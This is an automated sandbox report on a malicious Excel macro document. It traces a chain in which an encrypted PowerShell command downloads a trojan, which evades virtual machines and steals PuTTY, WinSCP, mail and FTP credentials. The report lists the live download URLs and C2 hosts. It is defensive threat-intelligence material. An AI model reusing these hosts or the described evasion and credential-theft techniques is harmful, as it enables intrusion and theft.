                      Domain AccountsExploitation for Client Execution13Logon Script (Windows)Logon Script (Windows)Scripting22Credentials in Registry1Query Registry1SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsCommand and Scripting Interpreter11Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information11NTDSSecurity Software Discovery421Distributed Component Object ModelInput Capture11Scheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsPowerShell2Network Logon ScriptNetwork Logon ScriptTimestomp1LSA SecretsVirtualization/Sandbox Evasion24SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol22Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonMasquerading1Cached Domain CredentialsProcess Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion24DCSyncApplication Window Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection112Proc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 372951 Sample: MV TRIADES.xlsm Startdate: 22/03/2021 Architecture: WINDOWS Score: 100 45 Found malware configuration 2->45 47 Antivirus detection for URL or domain 2->47 49 Multi AV Scanner detection for submitted file 2->49 51 9 other signatures 2->51 10 EXCEL.EXE 57 15 2->10         started        process3 file4 37 C:\Users\user\Desktop\~$MV TRIADES.xlsm, data 10->37 dropped 13 cmd.exe 10->13         started        process5 signatures6 71 Encrypted powershell cmdline option found 13->71 16 powershell.exe 12 7 13->16         started        process7 dnsIp8 39 specfloors.net 107.180.99.252, 49165, 80 AS-26496-GO-DADDY-COM-LLCUS United States 16->39 35 C:\Users\user\AppData\Roaming\tNDFx.exe, PE32 16->35 dropped 53 Powershell drops PE file 16->53 21 tNDFx.exe 12 8 16->21         started        file9 signatures10 process11 dnsIp12 41 liverpoolsupporters9.com 172.67.176.78, 49167, 80 CLOUDFLARENETUS United States 21->41 55 Multi AV Scanner detection for dropped file 21->55 57 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 21->57 59 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 21->59 61 3 other signatures 21->61 25 tNDFx.exe 2 21->25         started        29 cmd.exe 21->29         started        31 tNDFx.exe 21->31         started        signatures13 process14 dnsIp15 43 smtp.jiratane.com 198.54.116.63, 49168, 587 NAMECHEAP-NETUS United States 25->43 63 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 25->63 65 Tries to steal Mail credentials (via file access) 25->65 67 Tries to harvest and steal ftp login credentials 25->67 69 2 other signatures 25->69 33 timeout.exe 29->33         started        signatures16 process17

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      MV TRIADES.xlsm45%VirustotalBrowse
                      MV TRIADES.xlsm43%ReversingLabsScript-Macro.Downloader.NetWired
                      MV TRIADES.xlsm100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Roaming\tNDFx.exe28%ReversingLabsWin32.Trojan.Wacatac

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      11.2.tNDFx.exe.400000.1.unpack100%AviraHEUR/AGEN.1138205Download File

                      Domains

                      SourceDetectionScannerLabelLink
                      specfloors.net0%VirustotalBrowse
                      smtp.jiratane.com4%VirustotalBrowse
                      liverpoolsupporters9.com1%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s615/1_FreeAgentPlayers.jpg0%Avira URL Cloudsafe
                      https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s180/1_FreeAgentPlayers.jpg0%Avira URL Cloudsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      http://ocsp.entrust.net030%URL Reputationsafe
                      http://ocsp.entrust.net030%URL Reputationsafe
                      http://ocsp.entrust.net030%URL Reputationsafe
                      http://smtp.jiratane.com0%Avira URL Cloudsafe
                      https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s458/1_FreeAgentPlayers.jpg0%Avira URL Cloudsafe
                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                      https://www.liverpool.com/liverpool-fc-news/features/0%Avira URL Cloudsafe
                      http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                      http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                      http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                      http://liverpoolsupporters9.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish-100%Avira URL Cloudmalware
                      https://www.liverpool.com/liverpool-fc-news/features/mohamed-salah-liverpool-goal-flaw-199458160%Avira URL Cloudsafe
                      https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s220b/0_Salah-Goal-vs-Leeds.jp0%Avira URL Cloudsafe
                      http://crl3.dJ0%Avira URL Cloudsafe
                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s270b/0_Salah-Goal-vs-Leeds.jp0%Avira URL Cloudsafe
                      http://specfloors.net/dev/income100%Avira URL Cloudmalware
                      https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03-0%Avira URL Cloudsafe
                      https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s180/0_Salah-Goal-vs-Leeds.jpg0%Avira URL Cloudsafe
                      http://specfloors.net/dev/income.exe100%Avira URL Cloudmalware
                      https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-03-0%Avira URL Cloudsafe
                      http://jEOkvI.com0%Avira URL Cloudsafe
                      http://liverpoolsupporters9.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-6C294B0CA76FD09CC6E09D2031D8695F.html100%Avira URL Cloudmalware
                      http://specfloors.net/dev/income.exePE100%Avira URL Cloudmalware
                      https://www.liverpool.com/liverpool-fc-news/features/liverpool-psg-transfer-news-199578500%Avira URL Cloudsafe
                      https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
                      https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
                      https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
                      https://i2-prod.live0%Avira URL Cloudsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      https://oMAWpB8PlZYBRN.org0%Avira URL Cloudsafe
                      http://liverpoolsupporters9.com100%Avira URL Cloudmalware
                      https://www.liverpool.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish-1995900%Avira URL Cloudsafe
                      http://specfloors.net100%Avira URL Cloudmalware
                      http://ocsp.entrust.net0D0%URL Reputationsafe
                      http://ocsp.entrust.net0D0%URL Reputationsafe
                      http://ocsp.entrust.net0D0%URL Reputationsafe
                      https://www.liverpool.com/all-about/steven-gerrard0%Avira URL Cloudsafe
                      https://api.ipify.org%0%URL Reputationsafe
                      https://api.ipify.org%0%URL Reputationsafe
                      https://api.ipify.org%0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      http://servername/isapibackend.dll0%Avira URL Cloudsafe
                      https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s458/0_WhatsApp-Image-2021-03-0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      specfloors.net
                      107.180.99.252
                      truefalseunknown
                      smtp.jiratane.com
                      198.54.116.63
                      truetrueunknown
                      liverpoolsupporters9.com
                      172.67.176.78
                      truefalseunknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://specfloors.net/dev/income.exetrue
                      • Avira URL Cloud: malware
                      unknown
                      http://liverpoolsupporters9.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-6C294B0CA76FD09CC6E09D2031D8695F.htmltrue
                      • Avira URL Cloud: malware
                      unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://127.0.0.1:HTTP/1.1tNDFx.exe, 0000000B.00000002.2351562307.0000000002191000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      low
                      http://DynDns.comDynDNStNDFx.exe, 0000000B.00000002.2351562307.0000000002191000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s615/1_FreeAgentPlayers.jpgtNDFx.exe, 00000006.00000002.2129490632.00000000022C0000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s180/1_FreeAgentPlayers.jpgtNDFx.exe, 00000006.00000002.2129490632.00000000022C0000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://crl.entrust.net/server1.crl0tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmpfalse
                        high
                        https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%hatNDFx.exe, 0000000B.00000002.2351562307.0000000002191000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://ocsp.entrust.net03tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://smtp.jiratane.comtNDFx.exe, 0000000B.00000002.2351747321.00000000022D6000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s458/1_FreeAgentPlayers.jpgtNDFx.exe, 00000006.00000002.2129490632.00000000022C0000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        https://www.liverpool.com/liverpool-fc-news/features/tNDFx.exe, 00000006.00000002.2129490632.00000000022C0000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.diginotar.nl/cps/pkioverheid0tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://liverpoolsupporters9.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish-tNDFx.exe, 00000006.00000002.2129469657.0000000002291000.00000004.00000001.sdmptrue
                        • Avira URL Cloud: malware
                        unknown
                        https://www.liverpool.com/liverpool-fc-news/features/mohamed-salah-liverpool-goal-flaw-19945816tNDFx.exe, 00000006.00000002.2129490632.00000000022C0000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s220b/0_Salah-Goal-vs-Leeds.jptNDFx.exe, 00000006.00000002.2129490632.00000000022C0000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://crl3.dJtNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://crl.pkioverheid.nl/DomOvLatestCRL.crl0tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.powershell.exe, 00000004.00000002.2105102393.00000000024C0000.00000002.00000001.sdmp, tNDFx.exe, 00000006.00000002.2133629732.0000000005190000.00000002.00000001.sdmp, tNDFx.exe, 0000000B.00000002.2353416224.0000000005DC0000.00000002.00000001.sdmpfalse
                          high
                          http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervpowershell.exe, 00000004.00000002.2103160491.000000000035E000.00000004.00000020.sdmpfalse
                            high
                            https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s270b/0_Salah-Goal-vs-Leeds.jptNDFx.exe, 00000006.00000002.2129490632.00000000022C0000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://specfloors.net/dev/incomepowershell.exe, 00000004.00000002.2113001292.000000000357D000.00000004.00000001.sdmptrue
                            • Avira URL Cloud: malware
                            unknown
                            https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03-tNDFx.exe, 00000006.00000002.2129490632.00000000022C0000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s180/0_Salah-Goal-vs-Leeds.jpgtNDFx.exe, 00000006.00000002.2129490632.00000000022C0000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-03-tNDFx.exe, 00000006.00000002.2129490632.00000000022C0000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://jEOkvI.comtNDFx.exe, 0000000B.00000002.2351562307.0000000002191000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://specfloors.net/dev/income.exePEpowershell.exe, 00000004.00000002.2113001292.000000000357D000.00000004.00000001.sdmptrue
                            • Avira URL Cloud: malware
                            unknown
                            https://www.liverpool.com/liverpool-fc-news/features/liverpool-psg-transfer-news-19957850tNDFx.exe, 00000006.00000002.2129490632.00000000022C0000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.piriform.com/ccleanerpowershell.exe, 00000004.00000002.2103160491.000000000035E000.00000004.00000020.sdmpfalse
                              high
                              https://api.ipify.org%GETMozilla/5.0tNDFx.exe, 0000000B.00000002.2351562307.0000000002191000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              low
                              https://i2-prod.livetNDFx.exe, 00000006.00000002.2129490632.00000000022C0000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.%s.comPApowershell.exe, 00000004.00000002.2105102393.00000000024C0000.00000002.00000001.sdmp, tNDFx.exe, 00000006.00000002.2133629732.0000000005190000.00000002.00000001.sdmp, tNDFx.exe, 0000000B.00000002.2353416224.0000000005DC0000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              low
                              https://oMAWpB8PlZYBRN.orgtNDFx.exe, 0000000B.00000002.2351680461.000000000226B000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://liverpoolsupporters9.comtNDFx.exe, 00000006.00000002.2129469657.0000000002291000.00000004.00000001.sdmptrue
                              • Avira URL Cloud: malware
                              unknown
                              https://www.liverpool.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish-199590tNDFx.exe, 00000006.00000002.2129490632.00000000022C0000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://specfloors.netpowershell.exe, 00000004.00000002.2113001292.000000000357D000.00000004.00000001.sdmptrue
                              • Avira URL Cloud: malware
                              unknown
                              http://ocsp.entrust.net0DtNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              https://www.liverpool.com/all-about/steven-gerrardtNDFx.exe, 00000006.00000002.2129490632.00000000022C0000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nametNDFx.exe, 00000006.00000002.2129469657.0000000002291000.00000004.00000001.sdmpfalse
                                high
                                https://secure.comodo.com/CPS0tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmpfalse
                                  high
                                  https://api.ipify.org%tNDFx.exe, 0000000B.00000002.2351624860.000000000221A000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  low
                                  https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziptNDFx.exe, 00000006.00000002.2134883837.0000000006A8F000.00000004.00000001.sdmp, tNDFx.exe, 0000000B.00000002.2350984768.0000000000402000.00000040.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://servername/isapibackend.dlltNDFx.exe, 00000006.00000002.2134297073.0000000005E20000.00000002.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  low
                                  http://crl.entrust.net/2048ca.crl0tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmpfalse
                                    high
                                    https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s458/0_WhatsApp-Image-2021-03-tNDFx.exe, 00000006.00000002.2129490632.00000000022C0000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown

                                    Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public

                                    IPDomainCountryFlagASNASN NameMalicious
                                    172.67.176.78
                                    liverpoolsupporters9.comUnited States
                                    13335CLOUDFLARENETUSfalse
                                    198.54.116.63
                                    smtp.jiratane.comUnited States
                                    22612NAMECHEAP-NETUStrue
                                    107.180.99.252
                                    specfloors.netUnited States
                                    26496AS-26496-GO-DADDY-COM-LLCUSfalse

                                    General Information

                                    Joe Sandbox Version:31.0.0 Emerald
                                    Analysis ID:372951
                                    Start date:22.03.2021
                                    Start time:15:35:13
                                    Joe Sandbox Product:CloudBasic
                                    Overall analysis duration:0h 17m 16s
                                    Hypervisor based Inspection enabled:false
                                    Report type:light
                                    Sample file name:MV TRIADES.xlsm
                                    Cookbook file name:defaultwindowsofficecookbook.jbs
                                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                    Number of analysed new started processes analysed:13
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • HDC enabled
                                    • GSI enabled (VBA)
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Detection:MAL
                                    Classification:mal100.troj.spyw.expl.evad.winXLSM@15/10@3/3
                                    EGA Information:Failed
                                    HDC Information:
                                    • Successful, ratio: 2% (good quality ratio 2%)
                                    • Quality average: 84.3%
                                    • Quality standard deviation: 21%
                                    HCA Information:
                                    • Successful, ratio: 99%
                                    • Number of executed functions: 0
                                    • Number of non-executed functions: 0
                                    Cookbook Comments:
                                    • Adjust boot time
                                    • Enable AMSI
                                    • Found application associated with file extension: .xlsm
                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                    • Attach to Office via COM
                                    • Scroll down
                                    • Close Viewer
                                    Warnings:
                                    Show All
                                    • Max analysis timeout: 720s exceeded, the analysis took too long
                                    • TCP Packets have been reduced to 100
                                    • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, conhost.exe, svchost.exe
                                    • Excluded IPs from analysis (whitelisted): 8.253.207.121, 8.238.28.254, 8.238.85.254, 8.253.207.120, 8.238.30.254
                                    • Excluded domains from analysis (whitelisted): audownload.windowsupdate.nsatc.net, ctldl.windowsupdate.com, auto.au.download.windowsupdate.com.c.footprint.net, au-bg-shim.trafficmanager.net
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    15:35:41API Interceptor61x Sleep call for process: powershell.exe modified
                                    15:35:48API Interceptor1076x Sleep call for process: tNDFx.exe modified

                                    Joe Sandbox View / Context

                                    IPs

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    172.67.176.78IMG_1024_363_17.pdf.exeGet hashmaliciousBrowse
                                    • liverpoolsupporters9.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-AF5734FDC5BC02E3380E1236CC01A9AE.html
                                    income.exeGet hashmaliciousBrowse
                                    • liverpoolsupporters9.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-6C294B0CA76FD09CC6E09D2031D8695F.html
                                    IMG_50_70_66301.docGet hashmaliciousBrowse
                                    • liverpoolsupporters9.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-C8A9B590352BD9C6D2E64B3D14C088F9.html
                                    IMG_251_45_013.docGet hashmaliciousBrowse
                                    • liverpoolsupporters9.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-4C78BD7CD35DADE3CF28759182F2D653.html
                                    IMG_501_76_1775.docGet hashmaliciousBrowse
                                    • liverpoolsupporters9.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-29CD977A7A361AF2606F27C6B01DEE59.html
                                    RFQ.scr.exeGet hashmaliciousBrowse
                                    • liverpoolsupporters9.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-FB7600CB3A820E62568D666C00820C4A.html
                                    PO350KW30021.exeGet hashmaliciousBrowse
                                    • liverpoolsupporters9.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-257ABF51706A44C548CD607ADCB0C1FC.html
                                    mj8ejPVt3a.exeGet hashmaliciousBrowse
                                    • liverpoolsupporters9.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-2537464CE3227EE44144CDC523917958.html
                                    Po # 6-10331.exeGet hashmaliciousBrowse
                                    • liverpoolsupporters9.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-C6505A2524A51F40F1680539070223E9.html
                                    4849708PO # RMS0001.exeGet hashmaliciousBrowse
                                    • liverpoolsupporters9.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-93D8A0A26DFD91C35256956F4B9683F6.html
                                    Drawings_pdf.exeGet hashmaliciousBrowse
                                    • liverpoolsupporters9.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-391FD31F547A7FD54F297CDEECE4B7FC.html
                                    ORDER 71902.docGet hashmaliciousBrowse
                                    • liverpoolsupporters9.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-E23ED3D9AC0156C980E7678E18BFFE6E.html
                                    Final Invoice.docGet hashmaliciousBrowse
                                    • liverpoolsupporters9.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-C3D2B2E00FD2D0A487EE9D3E4ED34E37.html
                                    198.54.116.63income.exeGet hashmaliciousBrowse
                                      2vWeR8OLTD.exeGet hashmaliciousBrowse
                                        BomboFile.exeGet hashmaliciousBrowse
                                          iRBtfxsY9Z.exeGet hashmaliciousBrowse
                                            847819930299338189289.exeGet hashmaliciousBrowse
                                              37Security Deposit_PDF.jsGet hashmaliciousBrowse

                                                Domains

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                liverpoolsupporters9.comIMG_1024_363_17.pdf.exeGet hashmaliciousBrowse
                                                • 104.21.88.100
                                                income.exeGet hashmaliciousBrowse
                                                • 172.67.176.78
                                                IMG_50_70_66301.docGet hashmaliciousBrowse
                                                • 104.21.88.100
                                                IMG_251_45_013.docGet hashmaliciousBrowse
                                                • 172.67.176.78
                                                IMG_501_76_1775.docGet hashmaliciousBrowse
                                                • 104.21.88.100
                                                RFQ.scr.exeGet hashmaliciousBrowse
                                                • 172.67.176.78
                                                PO350KW30021.exeGet hashmaliciousBrowse
                                                • 172.67.176.78
                                                mj8ejPVt3a.exeGet hashmaliciousBrowse
                                                • 172.67.176.78
                                                Po # 6-10331.exeGet hashmaliciousBrowse
                                                • 172.67.176.78
                                                4849708PO # RMS0001.exeGet hashmaliciousBrowse
                                                • 172.67.176.78
                                                MACHINE SPECIFICATION.exeGet hashmaliciousBrowse
                                                • 104.21.88.100
                                                Drawings_pdf.exeGet hashmaliciousBrowse
                                                • 172.67.176.78
                                                ORDER 71902.docGet hashmaliciousBrowse
                                                • 172.67.176.78
                                                JVMkQyfuM8.exeGet hashmaliciousBrowse
                                                • 104.21.88.100
                                                Final Invoice.docGet hashmaliciousBrowse
                                                • 172.67.176.78
                                                smtp.jiratane.comincome.exeGet hashmaliciousBrowse
                                                • 198.54.116.63
                                                2vWeR8OLTD.exeGet hashmaliciousBrowse
                                                • 198.54.116.63

                                                ASN

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                CLOUDFLARENETUSSecuriteInfo.com.Trojan.Siggen12.46475.27996.exeGet hashmaliciousBrowse
                                                • 172.67.162.110
                                                IMG_1024_363_17.pdf.exeGet hashmaliciousBrowse
                                                • 172.67.188.154
                                                income.exeGet hashmaliciousBrowse
                                                • 172.67.176.78
                                                IMG_50_70_66301.docGet hashmaliciousBrowse
                                                • 172.67.176.78
                                                IMG_251_45_013.docGet hashmaliciousBrowse
                                                • 104.21.19.200
                                                Requirements.docGet hashmaliciousBrowse
                                                • 104.21.45.223
                                                IMG_501_76_1775.docGet hashmaliciousBrowse
                                                • 172.67.176.78
                                                NEW ORDER.exeGet hashmaliciousBrowse
                                                • 172.67.188.154
                                                RFQ.scr.exeGet hashmaliciousBrowse
                                                • 172.67.176.78
                                                swift copy.exeGet hashmaliciousBrowse
                                                • 172.67.188.154
                                                SWIFT COPY_PDF.exeGet hashmaliciousBrowse
                                                • 172.67.161.235
                                                PO350KW30021.exeGet hashmaliciousBrowse
                                                • 172.67.176.78
                                                n64QPFbX1S.dllGet hashmaliciousBrowse
                                                • 104.20.185.68
                                                IcedID.dllGet hashmaliciousBrowse
                                                • 104.20.185.68
                                                Lifebloom-Purchase Order InquirySIBER210318(WB TAPE&YARN)#020221KA-.htmlGet hashmaliciousBrowse
                                                • 104.18.70.113
                                                Purchase Order.xlsGet hashmaliciousBrowse
                                                • 172.67.219.133
                                                Purchase Order.xlsGet hashmaliciousBrowse
                                                • 172.67.219.133
                                                9311-32400.pdf.exeGet hashmaliciousBrowse
                                                • 104.21.42.218
                                                ab76e3ddfecc8c84fd2179bb40cbe1c535963154c3e6e.exeGet hashmaliciousBrowse
                                                • 104.23.99.190
